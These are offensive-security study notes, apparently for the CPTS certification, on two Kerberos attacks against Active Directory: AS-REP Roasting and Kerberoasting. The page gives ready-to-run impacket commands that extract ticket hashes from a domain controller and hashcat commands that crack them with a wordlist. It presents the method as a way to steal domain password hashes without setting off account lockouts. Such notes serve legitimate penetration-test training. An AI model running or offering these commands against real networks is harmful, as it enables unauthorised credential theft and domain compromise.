Kerberos Exploitation: AS-REP & Kerberoasting
Kerberos ticket attacks: AS-REP Roasting for preauth-disabled accounts and Kerberoasting Service Principal Names.
impackethashcatrubeus
Kerberos attacks allow attackers to extract encrypted password hashes from Domain Controllers without triggering account lockouts.
1. AS-REP Roasting (No Pre-Authentication)
Target users that have DONT_REQ_PREAUTH enabled:
impacket-GetNPUsers {DOMAIN}/ -usersfile users.txt -dc-ip {TARGET_IP} -format hashcat -outputfile asreproast.hashes
Crack with Hashcat Mode 18200:
hashcat -m 18200 asreproast.hashes /usr/share/wordlists/rockyou.txt -O
2. Kerberoasting (Service Principal Names)
Request TGS tickets for accounts configured with an SPN:
impacket-GetUserSPNs {DOMAIN}/{USER}:{PASSWORD} -dc-ip {TARGET_IP} -request -outputfile hashes.kerberoast
Crack with Hashcat Mode 13100:
hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -O
Reference Hashcat mode numbers in 10. Password Cracking & Hash Identification.
More CPTS notes
- 01. Network Discovery & Port Scanning Guide
- 02. Web Content Discovery & Directory Fuzzing
- 03. Web Application Exploitation & Injection
- 04. Linux Privilege Escalation Master Guide
- 05. Windows Local Privilege Escalation & LOLBAS
- 06. Active Directory Attack Paths & Domain Enumeration
- 08. Active Directory Certificate Services (AD CS) Abuse
- 09. Pivoting, Tunnels & Lateral Movement
- 10. Password Cracking & Hash Identification
- 11. Offensive File Transfers Across Restricted Networks
- 12. Interactive TTY Stabilization & Terminal Spawning
Keep these notes in your own private vault. Open CPTS notes in ZeroBox